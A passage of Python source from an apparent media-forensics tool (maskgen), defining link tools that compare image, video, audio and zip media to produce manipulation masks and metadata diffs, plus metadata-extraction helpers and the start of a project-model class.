im1, startFileName = scModel.getImageAndName(start, arguments=arguments)
im2, destFileName = scModel.getImageAndName(end)
edge = scModel.G.get_edge(start, end)
operation = scModel.gopLoader.getOperationWithGroups(edge['op'])
mask, analysis,error = createMask(im1, im2, invert=False, arguments=arguments,
alternativeFunction=operation.getCompareFunction())
if error is not None:
logging.getLogger('maskgen').warn('Failed mask generation for operation {} between {} and {}'.format(
edge['op'] if edge is not None else 'NA',
start,
end
))
return im1, im2, mask, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
args = dict(arguments)
args['skipSnapshot'] = True
startIm, startFileName = scModel.getImageAndName(start, arguments=args)
destIm, destFileName = scModel.getImageAndName(destination)
errors = list()
operation = scModel.gopLoader.getOperationWithGroups(op)
mask, analysis = ImageWrapper(
np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8')), {}
if op == 'Donor':
errors = [
"An video cannot directly donate to an image. First select a frame using an appropriate operation."]
analysis = {}
else:
mask, analysis,error = createMask(startIm, destIm, invert=invert, arguments=arguments,
alternativeFunction=operation.getCompareFunction())
if error is not None:
errors.append(error)
logging.getLogger('maskgen').warn('Failed mask generation for operation {} between {} and {}'.format(
op,
start,
destination
))
exifDiff = exif.compareexif(startFileName, destFileName)
analysis = analysis if analysis is not None else {}
analysis['exifdiff'] = exifDiff
self._addAnalysis(startIm, destIm, op, analysis, mask, linktype='video.image',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, errors
class ZipImageLinkTool(VideoImageLinkTool):
"""
Supports mask construction and meta-data comparison when linking zip to image.
"""
def __init__(self):
VideoImageLinkTool.__init__(self)
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.donothing_stream_processor"
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask set and the meta-data diff results
"""
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(end)
mask, analysis, errors = self.compareImages(start, end, scModel, 'noOp', skipDonorAnalysis=True,
arguments=arguments, analysis_params={})
if 'videomasks' in analysis:
analysis['videomasks'] = VideoMaskSetInfo(analysis['videomasks'])
if 'errors' in analysis:
analysis['errors'] = VideoMaskSetInfo(analysis['errors'])
return startIm, destIm, mask, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
"""
:param start:
:param destination:
:param scModel:
:param op:
:param invert:
:param arguments:
:param skipDonorAnalysis:
:param analysis_params:
:return:
@type start: str
@type destination: str
@type scModel: ImageProjectModel
@type op: str
@type invert: bool
@type arguments: dict
"""
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask, analysis = ImageWrapper(
np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8')), {}
operation = scModel.gopLoader.getOperationWithGroups(op, fake=True)
maskSet = video_tools.formMaskDiffForImage(startFileName, destIm,
os.path.join(scModel.G.dir, start + '_' + destination),
op,
startSegment=getMilliSecondsAndFrameCount(arguments[
'Start Time']) if 'Start Time' in arguments else None,
endSegment=getMilliSecondsAndFrameCount(arguments[
'End Time']) if 'End Time' in arguments else None,
analysis=analysis,
alternateFunction=operation.getVideoCompareFunction(),
#alternateFrameFunction=operation.getCompareFunction(),
arguments=consolidate(arguments, analysis_params))
# for now, just save the first mask
if len(maskSet) > 0 and video_tools.get_mask_from_segment( maskSet[0] ) is not None:
mask = ImageWrapper(video_tools.get_mask_from_segment( maskSet[0] ))
for item in maskSet:
video_tools.drop_mask_from_segment(item)
analysis['masks count'] = len(maskSet)
analysis['videomasks'] = maskSet
metaDataDiff = None
analysis = analysis if analysis is not None else {}
analysis['metadatadiff'] = metaDataDiff
analysis['shape change'] = sizeDiff(startIm, destIm)
self._addAnalysis(startIm, destIm, op, analysis, mask, linktype='zip.image',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, []
class CollectionImageLinkTool(VideoImageLinkTool):
"""
Supports mask construction and meta-data comparison when linking zip to image.
"""
def __init__(self):
VideoImageLinkTool.__init__(self)
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.donothing_stream_processor"
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask set and the meta-data diff results
"""
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(end)
mask = np.ones((destIm.size[0],destIm.size[1]),dtype=np.uint8)*255
return startIm, destIm, ImageWrapper(mask), {}
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
"""
:param start:
:param destination:
:param scModel:
:param op:
:param invert:
:param arguments:
:param skipDonorAnalysis:
:param analysis_params:
:return:
@type start: str
@type destination: str
@type scModel: ImageProjectModel
@type op: str
@type invert: bool
@type arguments: dict
"""
startIm, destIm, mask, analysis = self.compare(start, destination, scModel)
return mask, analysis, []
class VideoVideoLinkTool(LinkTool):
"""
Supports mask construction and meta-data comparison when linking video to video.
"""
def __init__(self):
LinkTool.__init__(self)
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.video_without_audio_donor"
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask set and the meta-data diff results
"""
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(end)
mask, analysis, errors = self.compareImages(start, end, scModel, 'noOp',
arguments=arguments, analysis_params={})
if 'metadatadiff' in analysis:
analysis['metadatadiff'] = VideoMetaDiff(analysis['metadatadiff'])
if 'videomasks' in analysis:
analysis['videomasks'] = VideoMaskSetInfo(analysis['videomasks'])
if 'errors' in analysis:
analysis['errors'] = VideoMaskSetInfo(analysis['errors'])
return startIm, destIm, mask, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
"""
:param start:
:param destination:
:param scModel:
:param op:
:param invert:
:param arguments:
:param skipDonorAnalysis:
:param analysis_params:
:return:
@type start: str
@type destination: str
@type scModel: ImageProjectModel
@type op: str
@type invert: bool
@type arguments: dict
"""
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask, analysis = ImageWrapper(
np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8')), {}
operation = scModel.gopLoader.getOperationWithGroups(op, fake=True)
if op != 'Donor' and operation.generateMask not in ['audio', 'all']:
maskSet = video_tools.FileMetaDataLocator(startFileName).getMaskSetForEntireVideo()
if maskSet is None:
maskSet = list()
errors = list()
elif op == 'Donor' and not skipDonorAnalysis:
errors = list()
maskSet = self.processDonors(scModel, start, destination, startIm, startFileName, destIm, destFileName,
consolidate(arguments, analysis_params), invert=invert)
else:
arguments['generate_frames'] = 0
previewer = analysis_params.pop('controller') if 'controller' in analysis_params else None
maskSet, errors = video_tools.formMaskDiff(startFileName, destFileName,
os.path.join(scModel.G.dir, start + '_' + destination),
op,
startSegment=getMilliSecondsAndFrameCount(
arguments['Start Time']) if 'Start Time' in arguments else None,
endSegment=getMilliSecondsAndFrameCount(
arguments['End Time']) if 'End Time' in arguments else None,
analysis=analysis,
alternateFunction=operation.getVideoCompareFunction(),
#alternateFrameFunction=operation.getCompareFunction(),
arguments=consolidate(arguments, analysis_params),
controller=previewer)
mask = None
for item in maskSet:
if video_tools.get_mask_from_segment(item) is not None:
mask = ImageWrapper(video_tools.get_mask_from_segment(item))
video_tools.drop_mask_from_segment(item)
if mask is None:
mask = ImageWrapper(np.ones(startIm.image_array.shape[0:2], dtype='uint8')*255)
analysis['masks count'] = len(maskSet)
analysis['videomasks'] = maskSet
metaDataDiff = video_tools.form_meta_data_diff(startFileName, destFileName)
analysis = analysis if analysis is not None else {}
analysis['metadatadiff'] = metaDataDiff
analysis['shape change'] = sizeDiff(startIm, destIm)
self._addAnalysis(startIm, destIm, op, analysis, mask, linktype='video.video',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, errors
def addSubstituteMasks(self,start, destination, scModel, op, arguments={}, filename=''):
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
startSegment = getMilliSecondsAndFrameCount(arguments[
'Start Time']) if 'Start Time' in arguments else None
endSegment = getMilliSecondsAndFrameCount(arguments[
'End Time']) if 'End Time' in arguments else None
subs = video_tools.formMaskForSource(startFileName,
filename,
start + '_' + destination + '_substitute',
startTimeandFrame=startSegment,
stopTimeandFrame=endSegment
)
#if subs is not None:
# analysis = {}
# startIm, startFileName = scModel.getImageAndName(start)
# destIm, destFileName = scModel.getImageAndName(destination)
# maskSet, errors = video_tools.formMaskDiff(startFileName, destFileName,
# os.path.join(scModel.G.dir, start + '_' + destination + '_cmp'),
# op,
# startSegment=startSegment,
# endSegment=endSegment,
# analysis=analysis,
# alternateFunction=video_tools.maskCompare,
# arguments=arguments)
# how best to compare
return subs
class AudioVideoLinkTool(VideoVideoLinkTool):
"""
Supports mask construction and meta-data comparison when linking audio to video.
"""
def __init__(self):
VideoVideoLinkTool.__init__(self)
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.all_audio_processor"
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask set and the meta-data diff results
"""
analysis = dict()
if 'metadatadiff' in analysis:
analysis['metadatadiff'] = VideoMetaDiff(analysis['metadatadiff'])
if 'errors' in analysis:
analysis['errors'] = VideoMaskSetInfo(analysis['errors'])
return None, None, None, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
"""
:param start:
:param destination:
:param scModel:
:param op:
:param invert:
:param arguments:
:param skipDonorAnalysis:
:param analysis_params:
:return:
%type scModel: ImageProjectModel
"""
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask = ImageWrapper(np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8'))
analysis = dict()
analysis['masks count'] = 0
analysis['videomasks'] = list()
metaDataDiff = video_tools.form_meta_data_diff(startFileName, destFileName, frames=False, media_types=['audio'])
analysis = analysis if analysis is not None else {}
analysis['metadatadiff'] = metaDataDiff
operation = scModel.gopLoader.getOperationWithGroups(op, fake=True)
errors = []
if op == 'Donor':
errors = list()
maskSet = self.processDonors(scModel, start, destination, startIm, startFileName, destIm, destFileName,
consolidate(arguments, analysis_params), invert=invert)
elif op != 'Donor' and operation.generateMask in ['audio','all']:
maskSet, errors = video_tools.formMaskDiff(startFileName, destFileName,
os.path.join(scModel.G.dir, start + '_' + destination),
op,
startSegment=getMilliSecondsAndFrameCount(arguments[
'Start Time']) if 'Start Time' in arguments else None,
endSegment=getMilliSecondsAndFrameCount(arguments[
'End Time']) if 'End Time' in arguments else None,
analysis=analysis,
alternateFunction=operation.getVideoCompareFunction(),
arguments=consolidate(arguments, analysis_params))
else:
maskSet = video_tools.FileMetaDataLocator(startFileName).getMaskSetForEntireVideo( media_types=['audio'])
if maskSet is None:
maskSet = list()
errors = list()
analysis['masks count'] = len(maskSet)
analysis['videomasks'] = maskSet
self._addAnalysis(startIm, destIm, op, analysis, None, linktype='audio.audio',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, errors
class AudioAudioLinkTool(AudioVideoLinkTool):
"""
Supports mask construction and meta-data comparison when linking audio to audio.
"""
def __init__(self):
AudioVideoLinkTool.__init__(self)
class VideoAudioLinkTool(LinkTool):
"""
Supports mask construction and meta-data comparison when linking video to audio.
"""
def __init__(self):
LinkTool.__init__(self)
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.all_audio_processor"
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask set and the meta-data diff results
"""
analysis = dict()
if 'metadatadiff' in analysis:
analysis['metadatadiff'] = VideoMetaDiff(analysis['metadatadiff'])
if 'errors' in analysis:
analysis['errors'] = VideoMaskSetInfo(analysis['errors'])
return None, None, None, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False,
analysis_params={}):
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask = ImageWrapper(np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8'))
analysis = dict()
analysis['masks count'] = 0
analysis['videomasks'] = list()
metaDataDiff = video_tools.form_meta_data_diff(startFileName, destFileName, frames=False, media_types=['audio'])
analysis = analysis if analysis is not None else {}
analysis['metadatadiff'] = metaDataDiff
self._addAnalysis(startIm, destIm, op, analysis, None, linktype='video.audio',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, list()
class ImageVideoLinkTool(VideoVideoLinkTool):
"""
Supports mask construction and meta-data comparison when linking images to images.
"""
def __init__(self):
VideoVideoLinkTool.__init__(self)
def getDefaultDonorProcessor(self):
return "maskgen.masks.donor_rules.alpha_stream_processor"
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask = ImageWrapper(
np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8'))
if op == 'Donor':
mask = self.processDonors(scModel, start, destination, startIm, startFileName, destIm, destFileName,
consolidate(arguments, analysis_params), invert=invert)
if mask is None:
mask = startIm.to_mask().invert()
return mask, {}, list()
class ZipZipLinkTool(VideoVideoLinkTool):
"""
Supports mask construction and meta-data comparison when linking images to images.
"""
def __init__(self):
VideoVideoLinkTool.__init__(self)
def getDefaultDonorProcessor(self):
# not correct...TODO
return "maskgen.masks.donor_rules.all_stream_processors"
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
from support import setPathValue
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask = ImageWrapper(
np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8'))
analysis = {}
errors = list()
operation = scModel.gopLoader.getOperationWithGroups(op, fake=True)
rate = float(getValue(arguments, 'Frame Rate', 30))
if operation.generateMask in ['audio', 'meta']:
maskSet = video_tools.FileMetaDataLocator(startFileName).getMaskSetForEntireVideo()
if maskSet is None:
maskSet = list()
elif op == 'Donor' and not skipDonorAnalysis:
maskSet = self.processDonors(scModel, start, destination, startIm, startFileName, destIm, destFileName,
consolidate(arguments, analysis_params), invert=invert)
else:
maskSet, errors = video_tools.formMaskDiff(startFileName, destFileName,
os.path.join(scModel.G.dir, start + '_' + destination),
op,
startSegment=getMilliSecondsAndFrameCount(getValue(arguments,'Start Time',None)),
endSegment=getMilliSecondsAndFrameCount(getValue(arguments,'End Time',None)),
analysis=analysis,
alternateFunction=operation.getVideoCompareFunction(),
arguments=consolidate(arguments, analysis_params))
for item in maskSet:
if video_tools.get_mask_from_segment(item) is not None:
mask = ImageWrapper(video_tools.get_mask_from_segment(item))
video_tools.drop_mask_from_segment(item)
analysis['masks count'] = len(maskSet)
analysis['videomasks'] = maskSet
analysis['shape change'] = sizeDiff(startIm, destIm)
startZip = ZipCapture(startFileName,fps=rate)
endZip = ZipCapture(destFileName,fps=rate)
if startZip.get_size() != endZip.get_size():
setPathValue(analysis['metadatadiff'], 'video.nb_frames', ('change', startZip.get_size(), endZip.get_size()))
setPathValue(analysis['metadatadiff'], 'video.duration',
('change', startZip.get_size()/rate, endZip.get_size()/rate))
self._addAnalysis(startIm, destIm, op, analysis, mask, linktype='zip.zip',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, errors
class ZipVideoLinkTool(VideoVideoLinkTool):
"""
Supports mask construction and meta-data comparison when linking images to images.
"""
def __init__(self):
VideoVideoLinkTool.__init__(self)
def getDefaultDonorProcessor(self):
# not correct...TODO
return "maskgen.masks.donor_rules.all_stream_processors"
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
from support import setPathValue
from video_tools import get_rate_from_segment, get_frames_from_segment
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask = ImageWrapper(
np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8'))
analysis = {}
maskSet = video_tools.FileMetaDataLocator(startFileName).getMaskSetForEntireVideo(start_time=getValue(arguments,'Start Time',0),
end_time=getValue(arguments,'End Time'))
endMaskSet = video_tools.FileMetaDataLocator(destFileName).getMaskSetForEntireVideo()
analysis['masks count'] = len(maskSet)
for videomask in maskSet:
if 'mask' in videomask:
videomask.pop('mask')
analysis['videomasks'] = maskSet
rate = get_rate_from_segment(maskSet[0])
length = get_frames_from_segment(maskSet[0])
if length != get_frames_from_segment(endMaskSet[0]) or rate != get_rate_from_segment(endMaskSet[0]):
setPathValue(analysis['metadatadiff'], 'video.nb_frames',
('change', length, get_frames_from_segment(endMaskSet[0])))
setPathValue(analysis['metadatadiff'], 'video.duration',
('change', length/float(rate), get_frames_from_segment(endMaskSet[0]) / float(get_rate_from_segment(endMaskSet[0]))))
setPathValue(analysis['metadatadiff'], 'video.avg_frame_rate',
('change', rate,get_rate_from_segment(endMaskSet[0])))
return mask, analysis, []
class VideoZipLinkTool(ZipVideoLinkTool):
"""
Supports mask construction and meta-data comparison when linking images to images.
"""
def __init__(self):
ZipVideoLinkTool.__init__(self)
class ZipAudioLinkTool(VideoAudioLinkTool):
"""
Supports mask construction and meta-data comparison when linking images to images.
"""
def __init__(self):
VideoAudioLinkTool.__init__(self)
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask set and the meta-data diff results
"""
analysis = dict()
if 'metadatadiff' in analysis:
analysis['metadatadiff'] = VideoMetaDiff(analysis['metadatadiff'])
if 'errors' in analysis:
analysis['errors'] = VideoMaskSetInfo(analysis['errors'])
return None, None, None, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False,
analysis_params={}):
from zip_tools import AudioPositions
from support import setPathValue
from video_tools import create_segment, get_start_time_from_segment, get_end_time_from_segment,\
update_segment,get_rate_from_segment
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask = ImageWrapper(np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8'))
analysis = dict()
maskSet = video_tools.FileMetaDataLocator(destFileName).getMaskSetForEntireVideo(
start_time=getValue(arguments, 'Start Time', 0),
end_time=getValue(arguments, 'End Time'),
media_types=['audio'])
if not len(maskSet):
raise ValueError("Cannot find audio data target file {}".format(destFileName))
node = scModel.getGraph().get_node(start)
meta_data = getValue(node,'zip content meta')
if meta_data is None:
meta_data = getValue(ZipAddTool().getAdditionalMetaData(startFileName),'zip content meta')
def audio_metadata_extractor(filename):
return meta_data[os.path.basename(filename)]
fps = float(getValue(arguments,'sample rate',maskSet[-1]['rate']))
positions = AudioPositions(startFileName,
position_file_name=getValue(arguments,'Audio Sequence File'),
fps=int(fps),
audio_metadata_extractor=audio_metadata_extractor if meta_data is not None else None)
segments = [create_segment(starttime=seg[0],
startframe=seg[1],
endtime=seg[2],
endframe=seg[3],
type='audio',
frames=seg[3]-seg[1]+1,
rate=fps)
for seg in positions.get_segments(0)]
analysis['masks count'] = 0
analysis = analysis if analysis is not None else {}
analysis['metadatadiff'] = {}
analysis['videomasks'] = segments
cap_end_time = get_end_time_from_segment(maskSet[0])
if abs(get_end_time_from_segment(segments[-1]) - cap_end_time) > 0.001:
setPathValue(analysis['metadatadiff'],
'audio.duration',
('change',get_end_time_from_segment(segments[-1]),cap_end_time))
analysis['videomasks'] = [seg for seg in analysis['videomasks'] if get_start_time_from_segment(seg) < cap_end_time]
lastseg = analysis['videomasks'][-1]
update_segment(lastseg,
endtime = cap_end_time,
endframe = int(cap_end_time*get_rate_from_segment(lastseg)/1000)+ 1)
self._addAnalysis(startIm, destIm, op, analysis, None, linktype='video.audio',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, list()
class AudioZipLinkTool(VideoAudioLinkTool):
"""
Supports mask construction and meta-data comparison when linking images to images.
"""
def __init__(self):
VideoAudioLinkTool.__init__(self)
def compare(self, start, end, scModel, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask set and the meta-data diff results
"""
analysis = dict()
if 'metadatadiff' in analysis:
analysis['metadatadiff'] = VideoMetaDiff(analysis['metadatadiff'])
if 'errors' in analysis:
analysis['errors'] = VideoMaskSetInfo(analysis['errors'])
return None, None, None, analysis
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False,
analysis_params={}):
from zip_tools import AudioPositions
from support import setPathValue
from video_tools import create_segment, get_start_time_from_segment, get_end_time_from_segment,\
update_segment, get_end_frame_from_segment
startIm, startFileName = scModel.getImageAndName(start)
destIm, destFileName = scModel.getImageAndName(destination)
mask = ImageWrapper(np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8'))
analysis = dict()
# CAN HAVE A START TIME LATER
maskSet = video_tools.FileMetaDataLocator(startFileName).getMaskSetForEntireVideo(
start_time=getValue(arguments,'Start Time',0),
end_time=getValue(arguments, 'End Time'),
media_types=['audio'])
if not len(maskSet):
raise ValueError("Cannot find audio data target file {}".format(destFileName))
node = scModel.getGraph().get_node(start)
meta_data = getValue(node,'zip content meta')
if meta_data is None:
meta_data = getValue(ZipAddTool().getAdditionalMetaData(destFileName),'zip content meta')
def audio_metadata_extractor(filename):
return meta_data[os.path.basename(filename)]
fps = float(getValue(arguments,'sample rate',maskSet[-1]['rate']))
positions = AudioPositions(destFileName,
position_file_name=getValue(arguments,'Audio Sequence File'),
fps=int(fps),
audio_metadata_extractor=audio_metadata_extractor if meta_data is not None else None)
segments = [create_segment(starttime=seg[0],
startframe=seg[1],
endtime=seg[2],
endframe=seg[3],
type='audio',
frames=seg[3]-seg[1]+1,
rate=fps)
for seg in positions.get_segments(0)]
analysis['masks count'] = 0
analysis = analysis if analysis is not None else {}
analysis['metadatadiff'] = {}
analysis['videomasks'] = maskSet
cap_end_time = get_end_time_from_segment(maskSet[0])
diff = cap_end_time - get_end_time_from_segment(segments[-1])
errors = []
# IF NOT ALL THE AUDIO IS USED, THEN CUT THE END OF THE MASK SET
if diff > 0.001:
setPathValue(analysis['metadatadiff'],
'audio.duration',
('change',cap_end_time, get_end_time_from_segment(segments[-1])))
analysis['videomasks'] = [seg for seg in analysis['videomasks'] if get_start_time_from_segment(seg) < cap_end_time]
lastseg = analysis['videomasks'][-1]
update_segment(lastseg,
endtime = get_end_time_from_segment(segments[-1]),
endframe = get_end_frame_from_segment(segments[-1]))
elif diff < 0:
# THIS WOULD BE AN ODD OCCURRENCE. This would be ony is a sequence file is provided
# that created 'spaces'
if getValue(arguments,'Audio Sequence File') is None:
errors = ['Duration of target zip file is longer than the source given the provided time constraints']
# thought about checking the mask set without an end time, perhaps
# the sequence file is out of alignement with provided end time.
setPathValue(analysis['metadatadiff'],
'audio.duration',
('change', cap_end_time, get_end_time_from_segment(segments[-1])))
self._addAnalysis(startIm, destIm, op, analysis, None, linktype='video.audio',
arguments=consolidate(arguments, analysis_params),
start=start, end=destination, scModel=scModel)
return mask, analysis, errors
class ImageZipVideoLinkTool(VideoVideoLinkTool):
"""
Supports mask construction and meta-data comparison when linking images to images.
"""
def __init__(self):
VideoVideoLinkTool.__init__(self)
def compareImages(self, start, destination, scModel, op, invert=False, arguments={},
skipDonorAnalysis=False, analysis_params={}):
startIm, startFileName = scModel.getImageAndName(start)
#destIm, destFileName = scModel.getImageAndName(destination)
mask, analysis = ImageWrapper(
np.zeros((startIm.image_array.shape[0], startIm.image_array.shape[1])).astype('uint8')), {}
return mask, analysis, []
class AddTool:
def getAdditionalMetaData(self, media):
return {}
class VideoAddTool(AddTool):
def getAdditionalMetaData(self, media):
parent = {}
meta, frames = ffmpeg_api.get_meta_from_video(media, show_streams=True, with_frames=True, frame_limit=30, frame_meta=['pkt_duration_time'],media_types=['video'])
indices = ffmpeg_api.get_stream_indices_of_type(meta, 'video')
if indices:
if_vfr = ffmpeg_api.is_vfr(meta[indices[0]], frames=frames[indices[0]])
else:
if_vfr = False
meta, _ = ffmpeg_api.get_meta_from_video(media, show_streams=True,
frame_meta=['pkt_duration_time'])
parent['media'] = meta
width = 0
height = 0
rotation = 0
for item in meta:
if 'width' in item:
width = int(item['width'])
if 'height' in item:
height = int(item['height'])
if 'rotation' in item:
rotation = int(item['rotation'])
parent['shape'] = (width, height)
parent['rotation'] = rotation
if indices:
meta[indices[0]]['is_vfr'] = if_vfr
# redundant but requested by NIST
parent['is_vfr'] = if_vfr
return parent
class ZipAddTool(AddTool):
def getAdditionalMetaData(self, media):
import copy
from zipfile import ZipFile
file_type = zipFileType(media)
final_meta = {}
final_meta['media'] = []
if file_type in ['audio','video']:
tool = VideoAddTool()
duration = 0.0
frames = 0
capture = ZipCapture(media,filetypes=audiofiletypes + videofiletypes)
details = {}
while capture.isOpened():
if not capture.grab():
break
fn = capture.retrieve_file()
meta = tool.getAdditionalMetaData(fn)
new_meta = {}
for item in meta['media']:
if file_type == getValue(item, 'codec_type', 'text'):
if file_type == 'audio':
last_sample = getValue(meta, 'sample_rate', 48000)
last_duration = float(getValue(item, 'duration', getValue(meta, 'duration_ts', 1) / getValue(meta, 'sample_rate', 48000)))
last_frames = int(last_duration * 48000)
new_meta['audio'] = copy.copy(item)
details[os.path.basename(fn)] = item
else:
last_frames = int(getValue(item, 'nb_frames', 1))
last_duration = video_tools.estimate_duration(item, last_frames)
last_duration = getValue(item, 'duration', last_duration)
last_sample = last_frames/float(last_duration)
new_meta['video'] = copy.copy(item)
details[os.path.basename(fn)] = item
duration += float(last_duration)
frames += last_frames
if 'video' in new_meta:
new_meta['video']['duration'] = duration
new_meta['video']['nb_frames'] = frames
final_meta['media'] = [new_meta['video']]
if 'audio' in new_meta:
new_meta['audio']['duration'] = duration
new_meta['audio']['duration_ts'] = duration * last_sample
final_meta['media'] = meta['media'] + [new_meta['audio']]
final_meta['total duration'] = duration
final_meta['zip content meta'] = details
return final_meta
meta = {}
with ZipFile(media, 'r') as myzip:
names = myzip.namelist()
meta['length'] = len(names)
return meta
class OtherAddTool(AddTool):
def getAdditionalMetaData(self, media):
return {}
addTools = {
'video': VideoAddTool(),
'zip':ZipAddTool(),
'collection': OtherAddTool(),
'audio': OtherAddTool(),
'image': OtherAddTool()
}
linkTools = {'image.image': ImageImageLinkTool(), 'video.video': VideoVideoLinkTool(),
'image.video': ImageVideoLinkTool(), 'video.image': VideoImageLinkTool(),
'video.audio': VideoAudioLinkTool(), 'audio.video': AudioVideoLinkTool(),
'audio.audio': AudioAudioLinkTool(), 'zip.video': ZipVideoLinkTool(),
'collection.image': CollectionImageLinkTool(),
'zip.zip': ZipZipLinkTool(), 'video.zip': VideoZipLinkTool(),
'zip.image': ZipImageLinkTool(),
'zip.audio': ZipAudioLinkTool(),
'audio.zip': AudioZipLinkTool()}
def true_notify(object, message, **kwargs):
return True
class ImageProjectModel:
"""
A ProjectModel manages a project. A project is made up of a directed graph of Image nodes and links.
Each link is associated with a manipulation between the source image to the target image.
A link contains a mask(black and white) image file describing the changes.
A mask's X&Y dimensions match the source image.
A link contains a description of the manipulation operation, software used to perfrom the manipulation,
analytic results comparing source to target images, and an input mask path name. The input mask path name
describes a mask used by the manipulation software as a parameter describing the manipulation.
Links may be 'read-only' indicating that they are created through an automated plugin.
A ProjectModel can be reused to open new projects. It is designed to represent a view model (MVC).
A ProjectModel has two state paremeters, 'start' and 'end', containing the name of image nodes in the graph.
When both set, a link is selected. When 'start' is set and 'end' is None, only a single image node is selected.
Several methods on the ProjectModel depend on the state of these parameters. For example, adding a new link
to a image node, chooses the source node referenced by 'end' if set, otherwise it chooses the node referenced by 'start'
"""
G = None
start = None
end = None
notify = None
"""
@type G: ImageGraph
@type start: String
@type end: String
"""
lock = Lock()
def __init__(self, projectFileName, graph=None, notify=None,
baseImageFileName=None, username=None,tool=None):
self.probeMaskMemory = DummyMemory(None)
if notify is not None:
self.notify = notifiers.NotifyDelegate(
[notify, notifiers.QaNotifier(self), notifiers.ValidationNotifier(total_errors=None)])
else:
self.notify = notifiers.NotifyDelegate([true_notify])
if graph is not None:
graph.arg_checker_callback = self.__scan_args_callback
# Group Operations are tied to models since
# group operations are created by a local instance and stored in the graph model
# when used.
self.gopLoader = GroupOperationsLoader()
self.username = username if username is not None else get_username()
self._setup(projectFileName, graph=graph, baseImageFileName=baseImageFileName,tool=tool)
def set_notifier(self, notifier):
self.notify = notifiers.NotifyDelegate(
[notifier, notifiers.QaNotifier(self), notifiers.ValidationNotifier(total_errors=None)])
def get_dir(self):
return self.G.dir
def getGroupOperationLoader(self):
return self.gopLoader
def addImagesFromDir(self, dir, baseImageFileName=None, xpos=100, ypos=30, suffixes=list(),
sortalg=lambda s: s.lower(),preferences={}):
"""
Bulk add all images from a given directory into the project.
Position the images in a grid, separated by 50 vertically with a maximum height of 520.
Images are imported in lexicographic order, first importing JPG, then PNG and finally TIFF.
If baseImageFileName, the name of an image node, is provided, then that node is selected
upong completion of the operation. Otherwise, the last not imported is selected"
"""
initialYpos = ypos
totalSet = []
suffixes = set(suffixes)
for suffix in suffixes:
